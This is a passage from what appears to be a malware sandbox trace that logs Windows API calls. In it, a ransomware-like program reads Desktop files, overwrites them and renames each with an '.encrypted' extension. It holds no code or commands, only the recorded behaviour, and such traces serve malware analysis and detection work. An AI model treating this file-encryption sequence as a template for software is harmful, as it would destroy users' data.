ftCreationTime.dwLowDateTime=0x2bfabd00, ftCreationTime.dwHighDateTime=0x1d5e681, ftLastAccessTime.dwLowDateTime=0xe6e0bfb0, ftLastAccessTime.dwHighDateTime=0x1d5dbb5, ftLastWriteTime.dwLowDateTime=0x4267b500, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5530)) returned 1 [0153.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.411] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dj_db5l6vqeyuys.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dj_Db5l6vQeyuys.mp3.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dj_db5l6vqeyuys.mp3.encrypted")) returned 1 [0153.414] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", lpFilePart=0x0) returned 0x3a [0153.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i1abpglf8eug-rnj.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.414] GetFileType (hFile=0x4d0) returned 0x1 [0153.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.414] GetFileType (hFile=0x4d0) returned 0x1 [0153.414] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x92f1 [0153.414] ReadFile (in: hFile=0x4d0, lpBuffer=0x2437118, nNumberOfBytesToRead=0x92f1, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2437118*, lpNumberOfBytesRead=0x2ee894*=0x92f1, lpOverlapped=0x0) returned 1 [0153.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", lpFilePart=0x0) returned 0x3a [0153.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i1abpglf8eug-rnj.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.458] GetFileType (hFile=0x4d0) returned 0x1 [0153.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.458] GetFileType (hFile=0x4d0) returned 0x1 [0153.458] WriteFile (in: hFile=0x4d0, lpBuffer=0x22b46c0*, nNumberOfBytesToWrite=0x9300, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22b46c0*, lpNumberOfBytesWritten=0x2ee884*=0x9300, lpOverlapped=0x0) returned 1 [0153.459] CloseHandle (hObject=0x4d0) returned 1 [0153.460] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png", lpFilePart=0x0) returned 0x3a [0153.460] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png.encrypted", lpFilePart=0x0) returned 0x44 [0153.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i1abpglf8eug-rnj.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d9c8b0, ftCreationTime.dwHighDateTime=0x1d5db6b, ftLastAccessTime.dwLowDateTime=0x177a2e00, ftLastAccessTime.dwHighDateTime=0x1d5da11, ftLastWriteTime.dwLowDateTime=0x426ed920, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x9300)) returned 1 [0153.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.461] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i1abpglf8eug-rnj.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I1aBpgLf8euG-RNj.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i1abpglf8eug-rnj.png.encrypted")) returned 1 [0153.462] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", lpFilePart=0x0) returned 0x33 [0153.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jicmmpojd.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.463] GetFileType (hFile=0x4d0) returned 0x1 [0153.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.463] GetFileType (hFile=0x4d0) returned 0x1 [0153.463] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1037 [0153.463] ReadFile (in: hFile=0x4d0, lpBuffer=0x22bded8, nNumberOfBytesToRead=0x1037, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x22bded8*, lpNumberOfBytesRead=0x2ee894*=0x1037, lpOverlapped=0x0) returned 1 [0153.464] CloseHandle (hObject=0x4d0) returned 1 [0153.479] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.479] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.479] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", lpFilePart=0x0) returned 0x33 [0153.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jicmmpojd.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.481] GetFileType (hFile=0x4d0) returned 0x1 [0153.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.481] GetFileType (hFile=0x4d0) returned 0x1 [0153.481] WriteFile (in: hFile=0x4d0, lpBuffer=0x230ff24*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x230ff24*, lpNumberOfBytesWritten=0x2ee884*=0x1040, lpOverlapped=0x0) returned 1 [0153.482] CloseHandle (hObject=0x4d0) returned 1 [0153.483] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg", lpFilePart=0x0) returned 0x33 [0153.483] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg.encrypted", lpFilePart=0x0) returned 0x3d [0153.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.483] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jicmmpojd.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb870e530, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0xa2328ec0, ftLastAccessTime.dwHighDateTime=0x1d5e57e, ftLastWriteTime.dwLowDateTime=0x42739be0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1040)) returned 1 [0153.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.483] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jicmmpojd.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jiCMMpojd.jpg.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jicmmpojd.jpg.encrypted")) returned 1 [0153.485] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", lpFilePart=0x0) returned 0x38 [0153.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jth7ngkwmfidzn.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.485] GetFileType (hFile=0x4d0) returned 0x1 [0153.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.485] GetFileType (hFile=0x4d0) returned 0x1 [0153.485] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x13fd4 [0153.485] ReadFile (in: hFile=0x4d0, lpBuffer=0x2311444, nNumberOfBytesToRead=0x13fd4, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2311444*, lpNumberOfBytesRead=0x2ee894*=0x13fd4, lpOverlapped=0x0) returned 1 [0153.487] CloseHandle (hObject=0x4d0) returned 1 [0153.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", lpFilePart=0x0) returned 0x38 [0153.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jth7ngkwmfidzn.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.504] GetFileType (hFile=0x4d0) returned 0x1 [0153.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.504] GetFileType (hFile=0x4d0) returned 0x1 [0153.504] WriteFile (in: hFile=0x4d0, lpBuffer=0x239a1a4*, nNumberOfBytesToWrite=0x13fe0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x239a1a4*, lpNumberOfBytesWritten=0x2ee884*=0x13fe0, lpOverlapped=0x0) returned 1 [0153.506] CloseHandle (hObject=0x4d0) returned 1 [0153.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf", lpFilePart=0x0) returned 0x38 [0153.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf.encrypted", lpFilePart=0x0) returned 0x42 [0153.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.516] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jth7ngkwmfidzn.rtf"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fd88a0, ftCreationTime.dwHighDateTime=0x1d5e179, ftLastAccessTime.dwLowDateTime=0xa9ca3910, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0x4275fd40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x13fe0)) returned 1 [0153.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.516] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jth7ngkwmfidzn.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jTH7ngKWMFidZN.rtf.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jth7ngkwmfidzn.rtf.encrypted")) returned 1 [0153.518] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", lpFilePart=0x0) returned 0x34 [0153.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxqa99dezb.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.518] GetFileType (hFile=0x4d0) returned 0x1 [0153.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.518] GetFileType (hFile=0x4d0) returned 0x1 [0153.518] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x10f7d [0153.518] ReadFile (in: hFile=0x4d0, lpBuffer=0x23ae6a8, nNumberOfBytesToRead=0x10f7d, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23ae6a8*, lpNumberOfBytesRead=0x2ee894*=0x10f7d, lpOverlapped=0x0) returned 1 [0153.520] CloseHandle (hObject=0x4d0) returned 1 [0153.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.536] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", lpFilePart=0x0) returned 0x34 [0153.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxqa99dezb.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.537] GetFileType (hFile=0x4d0) returned 0x1 [0153.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.537] GetFileType (hFile=0x4d0) returned 0x1 [0153.537] WriteFile (in: hFile=0x4d0, lpBuffer=0x242e2ec*, nNumberOfBytesToWrite=0x10f80, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x242e2ec*, lpNumberOfBytesWritten=0x2ee884*=0x10f80, lpOverlapped=0x0) returned 1 [0153.539] CloseHandle (hObject=0x4d0) returned 1 [0153.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp", lpFilePart=0x0) returned 0x34 [0153.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp.encrypted", lpFilePart=0x0) returned 0x3e [0153.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.541] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxqa99dezb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216f3360, ftCreationTime.dwHighDateTime=0x1d5df93, ftLastAccessTime.dwLowDateTime=0x32c36c50, ftLastAccessTime.dwHighDateTime=0x1d5e0b8, ftLastWriteTime.dwLowDateTime=0x427ac000, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x10f80)) returned 1 [0153.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.541] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxqa99dezb.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KXQA99dezB.bmp.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxqa99dezb.bmp.encrypted")) returned 1 [0153.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", lpFilePart=0x0) returned 0x31 [0153.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ma8f_cd.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.543] GetFileType (hFile=0x4d0) returned 0x1 [0153.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.543] GetFileType (hFile=0x4d0) returned 0x1 [0153.543] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1b85 [0153.543] ReadFile (in: hFile=0x4d0, lpBuffer=0x243f740, nNumberOfBytesToRead=0x1b85, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x243f740*, lpNumberOfBytesRead=0x2ee894*=0x1b85, lpOverlapped=0x0) returned 1 [0153.544] CloseHandle (hObject=0x4d0) returned 1 [0153.570] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ma8F_cd.png", 